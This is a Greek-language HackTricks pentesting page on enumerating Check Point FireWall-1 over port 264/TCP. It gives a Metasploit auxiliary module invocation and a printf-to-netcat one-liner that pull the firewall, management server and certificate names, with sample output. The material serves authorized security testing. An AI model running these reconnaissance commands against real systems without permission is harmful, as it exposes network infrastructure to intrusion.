264 - Pentesting Check Point FireWall-1

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Είναι δυνατή η αλληλεπίδραση με τους τείχη προστασίας CheckPoint Firewall-1 για την ανακάλυψη πολύτιμων πληροφοριών, όπως το όνομα του τείχους προστασίας και το όνομα του σταθμού διαχείρισης. Αυτό μπορεί να γίνει αποστέλλοντας ένα ερώτημα στη θύρα 264/TCP.

Απόκτηση Ονομάτων Τείχους Προστασίας και Σταθμού Διαχείρισης

Χρησιμοποιώντας ένα αίτημα προεξουσιοδότησης, μπορείτε να εκτελέσετε ένα ενότητα που στοχεύει το CheckPoint Firewall-1. Τα απαραίτητα περιεχόμενα για αυτήν τη λειτουργία παρουσιάζονται παρακάτω:

use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10

Κατά την εκτέλεση, το αρθρωτό πρόσθετο προσπαθεί να επικοινωνήσει με την υπηρεσία SecuRemote Topology του τείχους προστασίας. Εάν επιτύχει, επιβεβαιώνει την παρουσία ενός τείχους προστασίας CheckPoint και ανακτά τα ονόματα τόσο του τείχους προστασίας όσο και του κεντρικού διακομιστή SmartCenter. Παρακάτω παρουσιάζεται ένα παράδειγμα του τι μπορεί να φαίνεται η έξοδος:

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

Εναλλακτική μέθοδος για την ανακάλυψη του ονόματος του υπολογιστή και του ονόματος ICA

Μια άλλη τεχνική περιλαμβάνει ένα απευθείας πρόγραμμα εντολών που στέλνει ένα συγκεκριμένο αίτημα στο τείχος προστασίας και αναλύει την απόκριση για να εξάγει το όνομα του υπολογιστή και το όνομα ICA του τείχους προστασίας. Η εντολή και η δομή της είναι οι εξής:

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-

Το αποτέλεσμα από αυτή την εντολή παρέχει λεπτομερείς πληροφορίες σχετικά με το όνομα πιστοποιητικού (CN) και τον οργανισμό (O) του τείχους προστασίας, όπως φαίνεται παρακάτω:

CN=Panama,O=MGMTT.srv.rxfrmi

Αναφορές

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated